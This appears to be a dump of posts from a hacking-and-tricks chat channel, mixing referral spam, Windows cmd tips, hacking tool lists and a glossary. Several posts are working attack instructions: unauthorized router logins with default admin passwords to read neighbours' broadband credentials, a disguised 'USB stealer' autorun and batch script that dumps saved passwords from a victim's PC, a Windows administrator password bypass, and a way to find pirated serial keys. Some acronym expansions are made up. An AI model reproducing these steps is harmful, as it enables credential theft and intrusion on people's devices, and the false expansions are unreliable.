N0 N@M€:
online money making :
The app will pay you to by just watching videos, playing games and by inviting others.
requirements:
1 PayPal account
2 email account
3 your patience
follow the steps carefully!!!
step 1 : GOTO play-store
and .......
invite your friends it will fully unlocked if the members are 500.
what are you waiting for copy the link and invite
How to check and get rid of viruses from your USB drive using cmd?
Step 1. Open cmd and goto the USB drive you want to check using the drive letters.
Eg. If your drive is on letter E then type "E:" and press enter.
Step 2. Type "chkdsk/f" and press enter. If any questions appear press "y" and enter.
I.e. if this didn't deleted a virus from your USB drive then you might need an updated antivirus preferably smadav.
Hack Broadbands nearby you with these simple Steps
➖➖➖➖➖➖➖➖➖➖➖➖
💠 Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)
💠 Step 2: First Get your ip from
CODE https://www.whatismyip.com. Asume your IP to be ×59.x.x.17
💠 Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range start: 59.x.x.1 to End:59.x.x.255
💠 Step 4: Then check in your scanner which alive IPs has the port 80 open
💠 Step 5: Enter that alive IP in your web browser
💠 Step 6: It asks for user , pass
Type User=admin
Password=admin or password
💠 It is the default password for most of the routers. if denied then use on another alive IP
💠 Step 7: If success then it will show router settings page of tht IP user
💠 There goto Home -> Wan Setting and the username and password of his account will appear there.
💠 Step 8: use Show Password to view the password.
🔰HOW TO MAKE A USB STEALER🔰
◼️TUTORIAL:
open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf
open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUNCH.bat
copy the autorun and launch file to your USB
go to http://www.nirsoft.net/ and download the programs named in step 2
extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB
click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer—-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords
NOTICE: this only recovers passwords that have once been saved on your computer
To reverse it:
1.download the 11.txt file
2.open the file and save as inthealer.bat
3.open the bat file
------------
Used to reverse the previous tutorial
#Tool
#Computer_Tricks Family 👇Top 50 Hacking Tools with their #Category
🔰Phishing Tools
1. SocialFish
2. ShellPhish
3. BlackEye
4. Weeman
🔰Information Gathering
5. Red Hawk
6. D-Tect
7. Lazy-Script
8. Pureblood Framework
9. ReconDog
10. Crips (Ip Tool)
11. EvilUrl IDN homograph
12. Lazymux
13. Tool - X
14. Angry Fuzzer
15. TheChoice
16. UserRecon
17. IPGeolocation-Trace Ip
18. Infoga-Collect Email-Info
🔰Vulnerability Analysis
19. OWScan
20. CMS Map Vul-Scanner
21. Click-jacking Scanner
22. TM-Scanner
23. Androbug Framework
24. SQLI Scanner
25. Commix
26. WPSeku Tool
27. RouterSploit Framework
28. Nikto web server - Scanner
29. Creadmap-check login Emails
🔰Exploitation
30. CMSeek Suit
31. Zarp-local Network Tool
32. TM-Venom
33. Metasploit Framework
34. A-Rat Exploit
35. Hulk (DDoS Tool)
36. Golden Eye (DDoS Tool)
37. Brutal
🔰Not Categorized
38. DarkFly-Tool
39. Apache2 - HTTP Server
40. Hash Cracker
41. Wordlist Generator
42. BruteSpray
43. KaliNetHunter
44. ChoiceBot
45. DarkSploit
46. Cyber Scan
47. Optiva Framework
48. Hakku Framework
49. Santet-Online
50. LazyFigle
☆F▪u▪n▪n▪y☆
🔊Funny channel keeps you smile up to date with funny memes 😝😝 gif anything you might miss Also making you smile 😂 invite your friends and let's make it more interesting
For any comment 👉👉 @T_28101996 👈👈
/channel/Ffuunyy
How to delete the undelete able folder
1) Open Cmd
2) goto the location you want to create the folder
3) Type 'RD aux\' hit enter
*** make sure the folder is empty or else this won't work.
How to unhide files
1. Open cmd
2. Go to the files location ( use the CD command)
3. Type attrib -s -h -r 'file name'
🔰Top 10 Common Hacking Techniques All Beginners Should Know About🔰
10. Keylogger
Keylogger is a simple software that records the key sequence and strokes of your keyboard into a log file on your machine. These log files might even contain your personal email IDs and passwords.
Keylogger is one of the main reasons why online banking sites give you an option to use their virtual keyboards.
9. Denial of Service (DoS\DDoS)
A Denial of Service attack is a hacking technique to take down a site or server by flooding that site or server with a lot of traffic that the server is unable to process all the requests in the real time and finally crashes down.
For DDoS attacks, hackers often deploy botnets or zombie computers which have got the only work to flood your system with request packets.
8. Waterhole attacks
If you are a big fan of Discovery or National Geographic channels, you could relate easily with the waterhole attacks. To poison a place, in this case, the hacker hits the most accessible physical point of the victim.
For example, if the source of a river is poisoned, it will hit the entire stretch of animals during summer. In the same way, hackers target the most accessed physical location to attack the victim. That point could be a coffee shop, a cafeteria etc.
Once hackers are aware of your timings, they might create a fake Wi-Fi access point and modify your most visited website to redirect them to you to get your personal information.
7. Fake WAP
Even just for fun, a hacker can use software to fake a wireless access point. This WAP connects to the official public place WAP. Once you get connected the fake WAP, a hacker can access your data, just like in the above case.
6. Eavesdropping (Passive Attacks)
Unlike other attacks which are active in nature, using a passive attack, a hacker just monitors the computer systems and networks to gain some unwanted information.
The motive behind eavesdropping is not to harm the system but to get some information without being identified.
5. Phishing
Phishing is a hacking technique using which a hacker replicates the most-accessed sites and traps the victim by sending that spoofed link.
Once the victim tries to login or enter some data, the hacker gets that private information of the target victim using the trojan running on the fake site.
4. Virus, Trojan etc.
Virus or trojans are malicious software programs which get installed into the victim’s system and keeps sending the victims data to the hacker.
3. ClickJacking Attacks
ClickJacking is also known by a different name, UI Redress. In this attack, the hacker hides the actual UI where the victim is supposed to click.
In another word, the attacker hijacks the clicks of the victim that aren’t meant for the exact page, but for a page where the hacker wants you to be.
2. Cookie theft
The cookies of a browser keep our personal data such as browsing history, username, and passwords for different sites that we access. Once the hacker gets the access to your cookie, he can even authenticate himself as you on a browser.
1. Bait and switch
Using bait and switch hacking technique, the hacker runs a malicious program which the user believes to be authentic. This way, after installing the malicious program on your computer, the hacker gets unprivileged access to your computer.
How to lock a folder
1) open cmd
2) locate the folder you want to lock
3) type "cacls 'folder location as shown on the picture' /e /p everyone:n
4) hit enter
Most Common Things You should know in cmd
1. MD - make directory
2. CD - change directory
3. RD - remove directory
4. Ren - Rename
5. Del - delete
❇️ The most important words
1.*PAN* - permanent account number.
2. *PDF* - portable document format.
3. *SIM* - Subscriber Identity Module.
4. *ATM* - Automated Teller machine.
5. *IFSC* - Indian Financial System Code.
6. *FSSAI(Fssai)* - Food Safety & Standards Authority of India.
7. *Wi-Fi* - Wireless fidelity.
8. *GOOGLE* - Global Organization Of Oriented Group
Language Of Earth.
9. *YAHOO* - Yet Another Hierarchical Officious Oracle.
10. *WINDOW* - Wide Interactive Network Development for Office work Solution.
11. *COMPUTER* - Common፡Oriented Machine. Particularly United and used under Technical and Educational Research.
12. *VIRUS* - Vital Information Resources Under Siege.
13. *UMTS* - Universal Mobile
Telecommunicati ons System.
14. *AMOLED* - Active-matrix organic light- emitting diode.
15. *OLED* - Organic light emitting diode.
16. *IMEI* - International Mobile Equipment Identity.
17. *ESN* - Electronic Serial Number.
18. *UPS* - Uninterruptible power supply.
19. *HDMI* - High-Definition Multimedia Interface.
20. *VPN* - Virtual private network.
21. *APN* - Access Point Name.
22. *LED* - Light emitting diode.
23. *DLNA* - Digital Living Network Alliance.
24. *RAM* - Random access memory.
25. *ROM* - Read only memory.
26. *VGA* - Video Graphics Array.
27. *QVGA* - Quarter Video Graphics Array.
28. *WVGA* - Wide video graphics array.
29. *WXGA* - Widescreen Extended Graphics Array.
30. *USB* - Universal serial Bus.
━━━━━━━━━━
N0 N@M€:
...GOTO play store and search for clip claps and download
step 2 :open account with either with your email or Facebook account
step 3: click the button on the right corner and enter
8443528226 then get 1$ .
to withdraw just use your PayPal account or refile airtime
😵😵😵WARNING😵😵😵
😵😵DON'T USE VPN😵😵
N0 N@M€:
PayPal
What is PayPal ?
PayPal is one of the largest online payment transfer platforms in the world, serving more than 200 countries in 25 currencies.
How to create PayPal account ?
It's easy go to Play-store and install the PayPal app then just follow the steps there to create personal account if you have questions be free to ask me @nonamean272636
Chadwick Boseman, star of "Black Panther," has died at 43 and 4-year struggle with colon cancer.
#RIP
@plnoname3873
🔰 HOW TO RUN .EXE FILE IN ANDROID 🔰
🌀 Files with the EXE extension are executable files intended for use within Windows or MS-DOS. You can't make all EXE files work on an Android. However, many older DOS-based EXE files can be opened with the DOS emulator DOSBox.
♦️ Step 1
Install a DOSBox app on your Android device. AnDOSBox, aDosBox and DosBox Turbo are three different DOSBox apps available from the Google Play store.
♦️ Step 2
Open the DOSBox app.
♦️ Step 3
Type "cd \foldername" into the command line, where "foldername" denotes the folder in which your EXE is contained. For example, if your EXE is in the Download folder, type "cd \download."
♦️ Step 4
Click Enter on your Android keyboard.
♦️ Step 5
Enter the name of the EXE file. You do not need to enter the .exe extension.
♦️ Step 6
Tap "Enter" on your Android keyboard.
I'll upload the app to this channel soon
Top 11 Hackers software/Tools
1.Nmap:-used for Network Maper
2.SqlMap:-Databade Server Hacking using SQl Injection
3.Reaver:-for Burte Force Attack Against WI -FI
4.True Crack:-for Drive Password Cracker
5.Hexinject:- for Network Packet Injector & Sniffer
6.Commix:-OS Command Injection & Exploitation Tool
7.MiTMF:- for Man in theMiddle Attack FrameWork
8.Cookie Cadger:-Cookie Auditing Tool For Wired/Wireless Networks
9.Aircrak-ng:- WEP & WPA/WPA2-PSK Key Craking Tool
10.Burpsuite:-for website Securitiy Testing/Hacking
11,Meta Sploit:- Extensive Hacking Software For Computer/phone
12. Terminal: to hack wifi
To kill your Internet connection on your PC temporarily:
1. Download the intkiller.text
2. Open the file & Save as intkiller.bat
3. Open the bat file
-------------
Used to prevent others from using your PC to access internet
How to made winrar password cracker ?
1) download the bellow txt file
2) open it using notepad
3) click file
4) choose save as and save it as hack.bat
How to Change PC password using cmd
METHOD 1
1. Open cmd
2. Type "net user" hit enter
3. Type "net user 'administer name' *" hit enter
4. Type your password hit enter reenter your password and hit enter
How to create an undelete able folder
1) Open Cmd
2) goto the location you want to create the folder
3) Type 'MD aux\' hit enter
How to hide files
1. Open cmd
2. Go to the files location ( use the CD command)
3. Type attrib +s +h +r 'file name'
To unlock the folder enter the command below on cmd:
Cacls "folder location" /e /p everyone:f
N0 N@M€:
🔐እንዴት የ ማንኛዉንም windows computer administrator password ማለፍ እንችላለን?
▃▃▃▃▃▃▃▃▃▃▃▃▃▃▃▃
Way 1:
Requirements:
—> ማንኛዉም የwindows operating system የተጫነበት cd ወይም usb
Eg. Windows7 os or windows 8 os
Let’s begin………..
—> computrሩን ከ cd ወይም ከusb ማስነሳት(boot from cd or usb)
—> ልክ boot አርጎ ከተነሳ በኋላ shift+F10 መጫን ከዛ command promote ይከፈታል
ምናልባት command promote ካልከፈተ shift+fn+F10 ሞክሩት
—> Type “cd c:” without quotation then hit enter
—>Type “dir” hit enter
--> Windows የሚለው ዝርዝር እስከሚመጣ ድረስ ፊደሉን እየቀያየሩ መሞከር
Eg. “D:” hit enter then “dir” hit enter then check “windows”
“E:” hit enter then “dir” hit enter then check “windows”
—> ከዛ በ ስእሉ ላይ የሚታየዉን በትክክል ይጻፉ
—> “cd windows/system32” hit enter
--> Type “rename osk.exe osk.old” hit enter
—> Type “rename cmd.exe osk.exe” hit enter
--> አሁን 75% ሚሆነዉን ስራ ጨርሰናል ከዚ ቀጥሎ computerun restart ማድረግ
—> ከስር በግራ በኩል የሚታየዉን icon መጫን
—>On-Screen Keyboard የሚለዉን መምረጥ
-->command promote display ሲሆን ስእሉ ላይ ያለዉን command ማስገባት
—> Type ”net user” hit enter
—> Type ”net user noname * ” hit enter —---- noname ማለት የ computeru ስም ነው
-->ከዛ ምትፈልጉትን password ማስገባት
—> Password እንድይኖረው ከፈለጋቹ ደሞ hit enter ሁለቴ
--> አሁን Passwordu ተከይሯል ማለት ነው
—> የከየራቺሁትን Password አስግብታቹ login ማረግ
✍ ለጓደኛዎ #share ማድረጎን አይርሱ።
List of terms used in the field of hacking
🚩Adware − Adware is software designed to force pre-chosen ads to display on your system.
🚩Attack − An attack is an action that is done on a system to get its access and extract sensitive data.
🚩Back door − A back door, or trap door, is a hidden entry to a computing device or software that bypasses security measures, such as logins and password protections.
🚩Bot − A bot is a program that automates an action so that it can be done repeatedly at a much higher rate for a more sustained period than a human operator could do it. For example, sending HTTP, FTP or Telnet at a higher rate or calling script to create objects at a higher rate.
🚩Botnet − A botnet, also known as zombie army, is a group of computers controlled without their owners’ knowledge. Botnets are used to send spam or make denial of service attacks.
🚩Brute force attack − A brute force attack is an automated and the simplest kind of method to gain access to a system or website. It tries different combination of usernames and passwords, over and over again, until it gets in.
🚩Buffer Overflow − Buffer Overflow is a flaw that occurs when more data is written to a block of memory, or buffer, than the buffer is allocated to hold.
🚩Clone phishing − Clone phishing is the modification of an existing, legitimate email with a false link to trick the recipient into providing personal information.
🚩Cracker − A cracker is one who modifies the software to access the features which are considered undesirable by the person cracking the software, especially copy protection features.
🚩Denial of service attack (DoS) − A denial of service (DoS) attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.
🚩DDoS − Distributed denial of service attack.
🚩Exploit Kit − An exploit kit is software system designed to run on web servers, with the purpose of identifying software vulnerabilities in client machines communicating with it and exploiting discovered vulnerabilities to upload and execute malicious code on the client.
🚩Exploit − Exploit is a piece of software, a chunk of data, or a sequence of commands that takes advantage of a bug or vulnerability to compromise the security of a computer or network system.
🚩Firewall − A firewall is a filter designed to keep unwanted intruders outside a computer system or network while allowing safe communication between systems and users on the inside of the firewall.
🚩Keystroke logging − Keystroke logging is the process of tracking the keys which are pressed on a computer (and which touchscreen points are used). It is simply the map of a computer/human interface. It is used by gray and black hat hackers to record login IDs and passwords. Keyloggers are usually secreted onto a device using a Trojan delivered by a phishing email.
🚩Logic bomb − A virus secreted into a system that triggers a malicious action when certain conditions are met. The most common version is the time bomb.
🚩Malware − Malware is an umbrella term used to refer to a variety of forms of hostile or intrusive software, including computer viruses, worms, Trojan horses, ransomware, spyware, adware, scareware, and other malicious programs.
🚩Master Program − A master program is the program a black hat hacker uses to remotely transmit commands to infected zombie drones, normally to carry out Denial of Service attacks or spam attacks.
🚩Phishing − Phishing is an e-mail fraud method in which the perpetrator sends out legitimate-looking emails, in an attempt to gather personal and financial information from recipients.
🚩Phreaker − Phreakers are considered the original computer hackers and they are those who break into the telephone network illegally, typically to make free longdistance phone calls or to tap phone lines.
How To Find The Serial Key Of Any Software Free
1. First You Have To open Google Homepage or Google Front page.
2. Type there your Software Name and“94FBR“ (For e.g. ” Photoshop 94FBR“)
3. In Google search result you see your product key name or you can open any webpage link.
Use any product key and enjoy fully licensed software.
#TechHack